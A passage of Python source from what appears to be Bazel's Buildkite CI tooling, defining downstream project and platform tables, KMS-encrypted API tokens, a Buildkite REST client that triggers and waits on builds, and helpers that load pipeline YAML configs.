}[BUILDKITE_ORG]
# Projects can opt out of receiving GitHub issues from --notify by adding `"do_not_notify": True` to their respective downstream entry.
DOWNSTREAM_PROJECTS_PRODUCTION = {
"Android Studio Plugin": {
"git_repository": "https://github.com/bazelbuild/intellij.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/intellij/master/.bazelci/android-studio.yml",
"pipeline_slug": "android-studio-plugin",
},
"Android Testing": {
"git_repository": "https://github.com/googlesamples/android-testing.git",
"http_config": "https://raw.githubusercontent.com/googlesamples/android-testing/master/bazelci/buildkite-pipeline.yml",
"pipeline_slug": "android-testing",
},
"Bazel": {
"git_repository": "https://github.com/bazelbuild/bazel.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/bazel/master/.bazelci/postsubmit.yml",
"pipeline_slug": "bazel-bazel",
},
"Bazel Bench": {
"git_repository": "https://github.com/bazelbuild/bazel-bench.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/bazel-bench/master/.bazelci/postsubmit.yml",
"pipeline_slug": "bazel-bench",
},
"Bazel Codelabs": {
"git_repository": "https://github.com/bazelbuild/codelabs.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/codelabs/master/.bazelci/presubmit.yml",
"pipeline_slug": "bazel-codelabs",
"disabled_reason": "https://github.com/bazelbuild/codelabs/issues/38",
},
"Bazel Examples": {
"git_repository": "https://github.com/bazelbuild/examples.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/examples/master/.bazelci/presubmit.yml",
"pipeline_slug": "bazel-bazel-examples",
},
"Bazel Federation": {
"git_repository": "https://github.com/bazelbuild/bazel-federation.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/bazel-federation/master/.bazelci/presubmit.yml",
"pipeline_slug": "bazel-federation",
"disabled_reason": "https://github.com/bazelbuild/bazel-federation/issues/126",
},
"Bazel Remote Cache": {
"git_repository": "https://github.com/buchgr/bazel-remote.git",
"http_config": "https://raw.githubusercontent.com/buchgr/bazel-remote/master/.bazelci/presubmit.yml",
"pipeline_slug": "bazel-remote-cache",
},
"Bazel integration testing": {
"git_repository": "https://github.com/bazelbuild/bazel-integration-testing.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/bazel-integration-testing/master/.bazelci/presubmit.yml",
"pipeline_slug": "bazel-integration-testing",
},
"Bazel skylib": {
"git_repository": "https://github.com/bazelbuild/bazel-skylib.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/bazel-skylib/main/.bazelci/presubmit.yml",
"pipeline_slug": "bazel-skylib",
"owned_by_bazel": True,
},
"Bazel toolchains": {
"git_repository": "https://github.com/bazelbuild/bazel-toolchains.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/bazel-toolchains/master/.bazelci/presubmit.yml",
"pipeline_slug": "bazel-toolchains",
},
"Bazel watcher": {
"git_repository": "https://github.com/bazelbuild/bazel-watcher.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/bazel-watcher/master/.bazelci/presubmit.yml",
"pipeline_slug": "bazel-watcher",
},
"Bazelisk": {
"git_repository": "https://github.com/bazelbuild/bazelisk.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/bazelisk/master/.bazelci/config.yml",
"pipeline_slug": "bazelisk",
},
"Buildfarm": {
"git_repository": "https://github.com/bazelbuild/bazel-buildfarm.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/bazel-buildfarm/main/.bazelci/presubmit.yml",
"pipeline_slug": "buildfarm-farmer",
},
"Buildtools": {
"git_repository": "https://github.com/bazelbuild/buildtools.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/buildtools/master/.bazelci/presubmit.yml",
"pipeline_slug": "buildtools",
},
"Cargo-Raze": {
"git_repository": "https://github.com/google/cargo-raze.git",
"http_config": "https://raw.githubusercontent.com/google/cargo-raze/master/.bazelci/presubmit.yml",
"pipeline_slug": "cargo-raze",
},
"CLion Plugin": {
"git_repository": "https://github.com/bazelbuild/intellij.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/intellij/master/.bazelci/clion.yml",
"pipeline_slug": "clion-plugin",
},
"Cartographer": {
"git_repository": "https://github.com/googlecartographer/cartographer.git",
"http_config": "https://raw.githubusercontent.com/googlecartographer/cartographer/master/.bazelci/presubmit.yml",
"pipeline_slug": "cartographer",
},
"Cloud Robotics Core": {
"git_repository": "https://github.com/googlecloudrobotics/core.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/continuous-integration/master/buildkite/pipelines/cloud-robotics-postsubmit.yml",
"pipeline_slug": "cloud-robotics-core",
},
"Envoy": {
"git_repository": "https://github.com/envoyproxy/envoy.git",
"http_config": "https://raw.githubusercontent.com/envoyproxy/envoy/master/.bazelci/presubmit.yml",
"pipeline_slug": "envoy",
},
"FlatBuffers": {
"git_repository": "https://github.com/google/flatbuffers.git",
"http_config": "https://raw.githubusercontent.com/google/flatbuffers/master/.bazelci/presubmit.yml",
"pipeline_slug": "flatbuffers",
"disabled_reason": "https://github.com/bazelbuild/bazel/issues/13811",
},
"Flogger": {
"git_repository": "https://github.com/google/flogger.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/continuous-integration/master/buildkite/pipelines/flogger.yml",
"pipeline_slug": "flogger",
},
"Gerrit": {
"git_repository": "https://gerrit.googlesource.com/gerrit.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/continuous-integration/master/buildkite/pipelines/gerrit-postsubmit.yml",
"pipeline_slug": "gerrit",
"disabled_reason": "https://github.com/bazelbuild/continuous-integration/issues/1182",
},
"Google Logging": {
"git_repository": "https://github.com/google/glog.git",
"http_config": "https://raw.githubusercontent.com/google/glog/master/.bazelci/presubmit.yml",
"pipeline_slug": "google-logging",
},
"IntelliJ Plugin": {
"git_repository": "https://github.com/bazelbuild/intellij.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/intellij/master/.bazelci/intellij.yml",
"pipeline_slug": "intellij-plugin",
},
"IntelliJ Plugin Aspect": {
"git_repository": "https://github.com/bazelbuild/intellij.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/intellij/master/.bazelci/aspect.yml",
"pipeline_slug": "intellij-plugin-aspect",
},
"Kythe": {
"git_repository": "https://github.com/kythe/kythe.git",
"http_config": "https://raw.githubusercontent.com/kythe/kythe/master/.bazelci/presubmit.yml",
"pipeline_slug": "kythe",
},
"Protobuf": {
"git_repository": "https://github.com/google/protobuf.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/continuous-integration/master/buildkite/pipelines/protobuf-postsubmit.yml",
"pipeline_slug": "protobuf",
"owned_by_bazel": True,
},
"Stardoc": {
"git_repository": "https://github.com/bazelbuild/stardoc.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/stardoc/master/.bazelci/presubmit.yml",
"pipeline_slug": "stardoc",
"owned_by_bazel": True,
},
"Subpar": {
"git_repository": "https://github.com/google/subpar.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/continuous-integration/master/buildkite/pipelines/subpar-postsubmit.yml",
"pipeline_slug": "subpar",
"owned_by_bazel": True,
"disabled_reason": "https://github.com/google/subpar/issues/133",
},
"TensorFlow": {
"git_repository": "https://github.com/tensorflow/tensorflow.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/continuous-integration/master/buildkite/pipelines/tensorflow-postsubmit.yml",
"pipeline_slug": "tensorflow",
"disabled_reason": "https://github.com/bazelbuild/bazel/issues/13811",
},
"Tulsi": {
"git_repository": "https://github.com/bazelbuild/tulsi.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/tulsi/master/.bazelci/presubmit.yml",
"pipeline_slug": "tulsi-bazel-darwin",
},
"re2": {
"git_repository": "https://github.com/google/re2.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/continuous-integration/master/buildkite/pipelines/re2-postsubmit.yml",
"pipeline_slug": "re2",
},
"rules_android": {
"git_repository": "https://github.com/bazelbuild/rules_android.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_android/master/.bazelci/postsubmit.yml",
"pipeline_slug": "rules-android",
"disabled_reason": "https://github.com/bazelbuild/rules_android/issues/15",
},
"rules_appengine": {
"git_repository": "https://github.com/bazelbuild/rules_appengine.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_appengine/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-appengine-appengine",
},
"rules_apple": {
"git_repository": "https://github.com/bazelbuild/rules_apple.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_apple/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-apple-darwin",
},
"rules_cc": {
"git_repository": "https://github.com/bazelbuild/rules_cc.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_cc/main/.bazelci/presubmit.yml",
"pipeline_slug": "rules-cc",
"owned_by_bazel": True,
},
"rules_closure": {
"git_repository": "https://github.com/bazelbuild/rules_closure.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_closure/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-closure-closure-compiler",
"owned_by_bazel": True,
},
"rules_d": {
"git_repository": "https://github.com/bazelbuild/rules_d.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_d/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-d",
},
"rules_docker": {
"git_repository": "https://github.com/bazelbuild/rules_docker.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_docker/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-docker-docker",
},
"rules_dotnet": {
"git_repository": "https://github.com/bazelbuild/rules_dotnet.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_dotnet/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-dotnet-edge",
},
"rules_foreign_cc": {
"git_repository": "https://github.com/bazelbuild/rules_foreign_cc.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_foreign_cc/main/.bazelci/config.yaml",
"pipeline_slug": "rules-foreign-cc",
"owned_by_bazel": True,
},
"rules_go": {
"git_repository": "https://github.com/bazelbuild/rules_go.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_go/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-go-golang",
},
"rules_groovy": {
"git_repository": "https://github.com/bazelbuild/rules_groovy.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_groovy/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-groovy",
},
"rules_gwt": {
"git_repository": "https://github.com/bazelbuild/rules_gwt.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_gwt/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-gwt",
"disabled_reason": "https://github.com/bazelbuild/continuous-integration/issues/1202",
},
"rules_haskell": {
"git_repository": "https://github.com/tweag/rules_haskell.git",
"http_config": "https://raw.githubusercontent.com/tweag/rules_haskell/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-haskell-haskell",
},
"rules_jsonnet": {
"git_repository": "https://github.com/bazelbuild/rules_jsonnet.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_jsonnet/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-jsonnet",
},
"rules_jvm_external": {
"git_repository": "https://github.com/bazelbuild/rules_jvm_external.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_jvm_external/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-jvm-external",
"owned_by_bazel": True,
},
"rules_jvm_external - examples": {
"git_repository": "https://github.com/bazelbuild/rules_jvm_external.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_jvm_external/master/.bazelci/examples.yml",
"pipeline_slug": "rules-jvm-external-examples",
"owned_by_bazel": True,
},
"rules_k8s": {
"git_repository": "https://github.com/bazelbuild/rules_k8s.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_k8s/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-k8s-k8s",
},
"rules_kotlin": {
"git_repository": "https://github.com/bazelbuild/rules_kotlin.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_kotlin/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-kotlin-kotlin",
},
"rules_nodejs": {
"git_repository": "https://github.com/bazelbuild/rules_nodejs.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_nodejs/stable/.bazelci/presubmit.yml",
"pipeline_slug": "rules-nodejs-nodejs",
},
"rules_perl": {
"git_repository": "https://github.com/bazelbuild/rules_perl.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_perl/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-perl",
},
"rules_proto": {
"git_repository": "https://github.com/bazelbuild/rules_proto.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_proto/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-proto",
"owned_by_bazel": True,
},
"rules_python": {
"git_repository": "https://github.com/bazelbuild/rules_python.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_python/main/.bazelci/presubmit.yml",
"pipeline_slug": "rules-python-python",
"owned_by_bazel": True,
},
"rules_rust": {
"git_repository": "https://github.com/bazelbuild/rules_rust.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_rust/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-rust-rustlang",
},
"rules_sass": {
"git_repository": "https://github.com/bazelbuild/rules_sass.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_sass/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-sass",
},
"rules_scala": {
"git_repository": "https://github.com/bazelbuild/rules_scala.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_scala/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-scala-scala",
"disabled_reason": "https://github.com/bazelbuild/rules_scala/issues/1224",
},
"rules_swift": {
"git_repository": "https://github.com/bazelbuild/rules_swift.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_swift/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-swift-swift",
"do_not_notify": "https://github.com/bazelbuild/continuous-integration/issues/915",
},
"rules_webtesting": {
"git_repository": "https://github.com/bazelbuild/rules_webtesting.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_webtesting/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-webtesting-saucelabs",
},
"upb": {
"git_repository": "https://github.com/protocolbuffers/upb.git",
"http_config": "https://raw.githubusercontent.com/protocolbuffers/upb/master/.bazelci/presubmit.yml",
"pipeline_slug": "upb",
},
}
DOWNSTREAM_PROJECTS_TESTING = {
"Bazel": DOWNSTREAM_PROJECTS_PRODUCTION["Bazel"],
"Bazelisk": DOWNSTREAM_PROJECTS_PRODUCTION["Bazelisk"],
"Federation": {
"git_repository": "https://github.com/fweikert/bazel-federation.git",
"http_config": "https://raw.githubusercontent.com/fweikert/bazel-federation/master/.bazelci/presubmit.yml",
"pipeline_slug": "bazel-federation",
},
"rules_docker": DOWNSTREAM_PROJECTS_PRODUCTION["rules_docker"],
"rules_go": DOWNSTREAM_PROJECTS_PRODUCTION["rules_go"],
"rules_groovy": DOWNSTREAM_PROJECTS_PRODUCTION["rules_groovy"],
"rules_kotlin": DOWNSTREAM_PROJECTS_PRODUCTION["rules_kotlin"],
"rules_nodejs": DOWNSTREAM_PROJECTS_PRODUCTION["rules_nodejs"],
"rules_rust": DOWNSTREAM_PROJECTS_PRODUCTION["rules_rust"],
"rules_scala": DOWNSTREAM_PROJECTS_PRODUCTION["rules_scala"],
}
DOWNSTREAM_PROJECTS = {
"bazel-testing": DOWNSTREAM_PROJECTS_TESTING,
"bazel-trusted": {},
"bazel": DOWNSTREAM_PROJECTS_PRODUCTION,
}[BUILDKITE_ORG]
DOCKER_REGISTRY_PREFIX = {
"bazel-testing": "bazel-public/testing",
"bazel-trusted": "bazel-public",
"bazel": "bazel-public",
}[BUILDKITE_ORG]
# A map containing all supported platform names as keys, with the values being
# the platform name in a human readable format, and the buildkite-agent's
# working directory.
PLATFORMS = {
"centos7": {
"name": "CentOS 7, Java 8",
"emoji-name": ":centos: 7 (Java 8)",
"downstream-root": "/var/lib/buildkite-agent/builds/${BUILDKITE_AGENT_NAME}/${BUILDKITE_ORGANIZATION_SLUG}-downstream-projects",
"publish_binary": ["ubuntu1404", "centos7", "linux"],
"docker-image": f"gcr.io/{DOCKER_REGISTRY_PREFIX}/centos7-java8",
"python": "python3.6",
},
"debian10": {
"name": "Debian Buster, OpenJDK 11",
"emoji-name": ":debian: Buster (OpenJDK 11)",
"downstream-root": "/var/lib/buildkite-agent/builds/${BUILDKITE_AGENT_NAME}/${BUILDKITE_ORGANIZATION_SLUG}-downstream-projects",
"publish_binary": [],
"docker-image": f"gcr.io/{DOCKER_REGISTRY_PREFIX}/debian10-java11",
"python": "python3.7",
},
"ubuntu1604": {
"name": "Ubuntu 16.04, OpenJDK 8",
"emoji-name": ":ubuntu: 16.04 (OpenJDK 8)",
"downstream-root": "/var/lib/buildkite-agent/builds/${BUILDKITE_AGENT_NAME}/${BUILDKITE_ORGANIZATION_SLUG}-downstream-projects",
"publish_binary": ["ubuntu1604"],
"docker-image": f"gcr.io/{DOCKER_REGISTRY_PREFIX}/ubuntu1604-java8",
"python": "python3.6",
},
"ubuntu1804": {
"name": "Ubuntu 18.04, OpenJDK 11",
"emoji-name": ":ubuntu: 18.04 (OpenJDK 11)",
"downstream-root": "/var/lib/buildkite-agent/builds/${BUILDKITE_AGENT_NAME}/${BUILDKITE_ORGANIZATION_SLUG}-downstream-projects",
"publish_binary": ["ubuntu1804"],
"docker-image": f"gcr.io/{DOCKER_REGISTRY_PREFIX}/ubuntu1804-java11",
"python": "python3.6",
},
"ubuntu2004": {
"name": "Ubuntu 20.04, OpenJDK 11",
"emoji-name": ":ubuntu: 20.04 (OpenJDK 11)",
"downstream-root": "/var/lib/buildkite-agent/builds/${BUILDKITE_AGENT_NAME}/${BUILDKITE_ORGANIZATION_SLUG}-downstream-projects",
"publish_binary": [],
"docker-image": f"gcr.io/{DOCKER_REGISTRY_PREFIX}/ubuntu2004-java11",
"python": "python3.8",
},
"kythe_ubuntu2004": {
"name": "Kythe (Ubuntu 20.04, OpenJDK 11)",
"emoji-name": "Kythe (:ubuntu: 20.04, OpenJDK 11)",
"downstream-root": "/var/lib/buildkite-agent/builds/${BUILDKITE_AGENT_NAME}/${BUILDKITE_ORGANIZATION_SLUG}-downstream-projects",
"publish_binary": [],
"docker-image": f"gcr.io/{DOCKER_REGISTRY_PREFIX}/ubuntu2004-java11-kythe",
"python": "python3.8",
},
"macos": {
"name": "macOS, OpenJDK 8",
"emoji-name": ":darwin: (OpenJDK 8)",
"downstream-root": "/Users/buildkite/builds/${BUILDKITE_AGENT_NAME}/${BUILDKITE_ORGANIZATION_SLUG}-downstream-projects",
"publish_binary": ["macos"],
"queue": "macos",
"python": "python3",
},
"macos_arm64": {
"name": "macOS (arm64), OpenJDK 8",
"emoji-name": ":darwin: (arm64) (OpenJDK 8)",
"downstream-root": "/Users/buildkite/builds/${BUILDKITE_AGENT_NAME}/${BUILDKITE_ORGANIZATION_SLUG}-downstream-projects",
"publish_binary": ["macos_arm64"],
# TODO(pcloudy): Switch to the macos_arm64 queue when Apple Silicon machines are available;
# currently we just use x86_64 machines to cross-compile.
"queue": "macos",
"python": "python3",
},
"windows": {
"name": "Windows, OpenJDK 8",
"emoji-name": ":windows: (OpenJDK 8)",
"downstream-root": "c:/b/${BUILDKITE_AGENT_NAME}/${BUILDKITE_ORGANIZATION_SLUG}-downstream-projects",
"publish_binary": ["windows"],
"queue": "windows",
"python": "python.exe",
},
"rbe_ubuntu1604": {
"name": "RBE (Ubuntu 16.04, OpenJDK 8)",
"emoji-name": "RBE (:ubuntu: 16.04, OpenJDK 8)",
"downstream-root": "/var/lib/buildkite-agent/builds/${BUILDKITE_AGENT_NAME}/${BUILDKITE_ORGANIZATION_SLUG}-downstream-projects",
"publish_binary": [],
"docker-image": f"gcr.io/{DOCKER_REGISTRY_PREFIX}/ubuntu1604-java8",
"python": "python3.6",
},
}
BUILDIFIER_DOCKER_IMAGE = "gcr.io/bazel-public/buildifier"
# The platform used for various steps (e.g. stuff that formerly ran on the "pipeline" workers).
DEFAULT_PLATFORM = "ubuntu1804"
# In order to test that "the one Linux binary" that we build for our official releases actually
# works on all Linux distributions that we test on, we use the Linux binary built on our official
# release platform for all Linux downstream tests.
LINUX_BINARY_PLATFORM = "centos7"
DEFAULT_XCODE_VERSION = "12.4"
XCODE_VERSION_REGEX = re.compile(r"^\d+\.\d+(\.\d+)?$")
XCODE_VERSION_OVERRIDES = {"10.2.1": "10.3", "11.2": "11.2.1", "11.3": "11.3.1"}
ENCRYPTED_SAUCELABS_TOKEN = """
CiQAry63sOlZtTNtuOT5DAOLkum0rGof+DOweppZY1aOWbat8zwSTQAL7Hu+rgHSOr6P4S1cu4YG
/I1BHsWaOANqUgFt6ip9/CUGGJ1qggsPGXPrmhSbSPqNAIAkpxYzabQ3mfSIObxeBmhKg2dlILA/
EDql
""".strip()
BUILD_LABEL_PATTERN = re.compile(r"^Build label: (\S+)$", re.MULTILINE)
BUILDIFIER_VERSION_ENV_VAR = "BUILDIFIER_VERSION"
BUILDIFIER_WARNINGS_ENV_VAR = "BUILDIFIER_WARNINGS"
BUILDIFIER_STEP_NAME = "Buildifier"
SKIP_TASKS_ENV_VAR = "CI_SKIP_TASKS"
CONFIG_FILE_EXTENSIONS = {".yml", ".yaml"}
KYTHE_DIR = "/usr/local/kythe"
INDEX_UPLOAD_POLICY_ALWAYS = "Always"
INDEX_UPLOAD_POLICY_IF_BUILD_SUCCESS = "IfBuildSuccess"
INDEX_UPLOAD_POLICY_NEVER = "Never"
class BuildkiteException(Exception):
"""
Raised whenever something goes wrong and we should exit with an error.
"""
pass
class BinaryUploadRaceException(Exception):
"""
Raised when try_publish_binaries wasn't able to publish a set of binaries,
because the generation of the current file didn't match the expected value.
"""
pass
class BuildkiteClient(object):
_ENCRYPTED_BUILDKITE_API_TOKEN = """
CiQA4DEB9ldzC+E39KomywtqXfaQ86hhulgeDsicds2BuvbCYzsSUAAqwcvXZPh9IMWlwWh94J2F
exosKKaWB0tSRJiPKnv2NPDfEqGul0ZwVjtWeASpugwxxKeLhFhPMcgHMPfndH6j2GEIY6nkKRbP
uwoRMCwe
""".strip()
_ENCRYPTED_BUILDKITE_API_TESTING_TOKEN = """
CiQAMTBkWjL1C+F5oon3+cC1vmum5+c1y5+96WQY44p0Lxd0PeASUQAy7iU0c6E3W5EOSFYfD5fA
MWy/SHaMno1NQSUa4xDOl5yc2kizrtxPPVkX4x9pLNuGUY/xwAn2n1DdiUdWZNWlY1bX2C4ex65e
P9w8kNhEbw==
""".strip()
_BUILD_STATUS_URL_TEMPLATE = (
"https://api.buildkite.com/v2/organizations/{}/pipelines/{}/builds/{}"
)
_NEW_BUILD_URL_TEMPLATE = "https://api.buildkite.com/v2/organizations/{}/pipelines/{}/builds"
_RETRY_JOB_URL_TEMPLATE = (
"https://api.buildkite.com/v2/organizations/{}/pipelines/{}/builds/{}/jobs/{}/retry"
)
def __init__(self, org, pipeline):
self._org = org
self._pipeline = pipeline
self._token = self._get_buildkite_token()
def _get_buildkite_token(self):
return decrypt_token(
encrypted_token=self._ENCRYPTED_BUILDKITE_API_TESTING_TOKEN
if THIS_IS_TESTING
else self._ENCRYPTED_BUILDKITE_API_TOKEN,
kms_key="buildkite-testing-api-token"
if THIS_IS_TESTING
else "buildkite-untrusted-api-token",
)
def _open_url(self, url, params=[]):
try:
params_str = "".join("&{}={}".format(k, v) for k, v in params)
return (
urllib.request.urlopen("{}?access_token={}{}".format(url, self._token, params_str))
.read()
.decode("utf-8", "ignore")
)
except urllib.error.HTTPError as ex:
raise BuildkiteException("Failed to open {}: {} - {}".format(url, ex.code, ex.reason))
def get_build_info(self, build_number):
"""Get build info for a pipeline with a given build number
See https://buildkite.com/docs/apis/rest-api/builds#get-a-build
Parameters
----------
build_number : the build number
Returns
-------
dict
the metadata for the build
"""
url = self._BUILD_STATUS_URL_TEMPLATE.format(self._org, self._pipeline, build_number)
output = self._open_url(url)
return json.loads(output)
def get_build_info_list(self, params):
"""Get a list of build infos for this pipeline
See https://buildkite.com/docs/apis/rest-api/builds#list-builds-for-a-pipeline
Parameters
----------
params : the parameters to filter the result
Returns
-------
list of dict
the metadata for a list of builds
"""
url = self._BUILD_STATUS_URL_TEMPLATE.format(self._org, self._pipeline, "")
output = self._open_url(url, params)
return json.loads(output)
def get_build_log(self, job):
return self._open_url(job["raw_log_url"])
@staticmethod
def _check_response(response, expected_status_code):
if response.status_code != expected_status_code:
eprint("Exit code:", response.status_code)
eprint("Response:\n", response.text)
response.raise_for_status()
def trigger_new_build(self, commit, message=None, env={}):
"""Trigger a new build at a given commit and return the build metadata.
See https://buildkite.com/docs/apis/rest-api/builds#create-a-build
Parameters
----------
commit : the commit we want to build at
message : the message we should use as the build title
env : (optional) the environment variables to set
Returns
-------
dict
the metadata for the build
"""
url = self._NEW_BUILD_URL_TEMPLATE.format(self._org, self._pipeline)
data = {
"commit": commit,
"branch": "master",
"message": message if message else f"Trigger build at {commit}",
"env": env,
}
response = requests.post(url + "?access_token=" + self._token, json=data)
BuildkiteClient._check_response(response, requests.codes.created)
return json.loads(response.text)
def trigger_job_retry(self, build_number, job_id):
"""Trigger a job retry and return the job metadata.
See https://buildkite.com/docs/apis/rest-api/jobs#retry-a-job
Parameters
----------
build_number : the number of the build we want to retry
job_id : the id of the job we want to retry
Returns
-------
dict
the metadata for the job
"""
url = self._RETRY_JOB_URL_TEMPLATE.format(self._org, self._pipeline, build_number, job_id)
response = requests.put(url + "?access_token=" + self._token)
BuildkiteClient._check_response(response, requests.codes.ok)
return json.loads(response.text)
def wait_job_to_finish(self, build_number, job_id, interval_time=30, logger=None):
"""Wait a job to finish and return the job metadata
Parameters
----------
build_number : the number of the build containing the job we want to wait for
job_id : the id of the job we want to wait for
interval_time : (optional) the interval time to check the build status, default to 30s
logger : (optional) a logger to report progress
Returns
-------
dict
the latest metadata for the job
"""
t = 0
build_info = self.get_build_info(build_number)
while True:
for job in build_info["jobs"]:
if job["id"] == job_id:
state = job["state"]
if state != "scheduled" and state != "running" and state != "assigned":
return job
break
else:
raise BuildkiteException(
f"job id {job_id} doesn't exist in build " + build_info["web_url"]
)
url = build_info["web_url"]
if logger:
logger.log(f"Waiting for {url}, waited {t} seconds...")
time.sleep(interval_time)
t += interval_time
build_info = self.get_build_info(build_number)
def wait_build_to_finish(self, build_number, interval_time=30, logger=None):
"""Wait a build to finish and return the build metadata
Parameters
----------
build_number : the number of the build we want to wait for
interval_time : (optional) the interval time to check the build status, default to 30s
logger : (optional) a logger to report progress
Returns
-------
dict
the latest metadata for the build
"""
t = 0
build_info = self.get_build_info(build_number)
while build_info["state"] == "scheduled" or build_info["state"] == "running":
url = build_info["web_url"]
if logger:
logger.log(f"Waiting for {url}, waited {t} seconds...")
time.sleep(interval_time)
t += interval_time
build_info = self.get_build_info(build_number)
return build_info
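# Usage sketch (hypothetical pipeline and commit; requires access to the
# encrypted Buildkite API token above):
#
#   client = BuildkiteClient(org=BUILDKITE_ORG, pipeline="bazel-bazel")
#   build = client.trigger_new_build("deadbeef", message="downstream test")
#   build = client.wait_build_to_finish(build["number"], interval_time=60)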
def decrypt_token(encrypted_token, kms_key):
return (
subprocess.check_output(
[
gcloud_command(),
"kms",
"decrypt",
"--project",
"bazel-untrusted",
"--location",
"global",
"--keyring",
"buildkite",
"--key",
kms_key,
"--ciphertext-file",
"-",
"--plaintext-file",
"-",
],
input=base64.b64decode(encrypted_token),
env=os.environ,
)
.decode("utf-8")
.strip()
)
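# Roughly equivalent shell invocation (a sketch; the project and flags are the
# ones hard-coded above, the key name depends on the kms_key argument):
#   echo "$ENCRYPTED_TOKEN" | base64 -d | \
#     gcloud kms decrypt --project bazel-untrusted --location global \
#       --keyring buildkite --key <kms_key> \
#       --ciphertext-file - --plaintext-file -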
def eprint(*args, **kwargs):
"""
Print to stderr and flush (just in case).
"""
print(*args, flush=True, file=sys.stderr, **kwargs)
def is_windows():
return os.name == "nt"
def gsutil_command():
return "gsutil.cmd" if is_windows() else "gsutil"
def gcloud_command():
return "gcloud.cmd" if is_windows() else "gcloud"
def downstream_projects_root(platform):
downstream_root = os.path.expandvars(PLATFORMS[platform]["downstream-root"])
if platform == "windows" and os.path.exists("d:/b"):
# If this is a Windows machine with a local SSD, the build directory is
# on drive D.
downstream_root = downstream_root.replace("c:/b/", "d:/b/")
if not os.path.exists(downstream_root):
os.makedirs(downstream_root)
return downstream_root
def fetch_configs(http_url, file_config):
"""
If specified, fetches the build configuration from file_config or http_url; otherwise tries to
read it from .bazelci/presubmit.yml.
Returns the json configuration as a python data structure.
"""
if file_config is not None and http_url is not None:
raise BuildkiteException("file_config and http_url cannot be set at the same time")
return load_config(http_url, file_config)
def load_config(http_url, file_config, allow_imports=True):
if http_url:
config = load_remote_yaml_file(http_url)
else:
file_config = file_config or ".bazelci/presubmit.yml"
with open(file_config, "r") as fd:
config = yaml.safe_load(fd)
# Legacy mode means that there is exactly one task per platform (e.g. ubuntu1604_nojdk),
# which means that we can get away with using the platform name as task ID.
# No other updates are needed since get_platform_for_task() falls back to using the
# task ID as platform if there is no explicit "platforms" field.
if "platforms" in config:
config["tasks"] = config.pop("platforms")
if "tasks" not in config:
config["tasks"] = {}
imports = config.pop("imports", None)
if imports:
if not allow_imports:
raise BuildkiteException("Nested imports are not allowed")
for i in imports:
imported_tasks = load_imported_tasks(i, http_url, file_config)
config["tasks"].update(imported_tasks)
return config
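# Illustrative (hypothetical) config showing the legacy conversion handled in
# load_config(): a top-level "platforms" section such as
#   platforms:
#     ubuntu1804:
#       build_targets: ["//..."]
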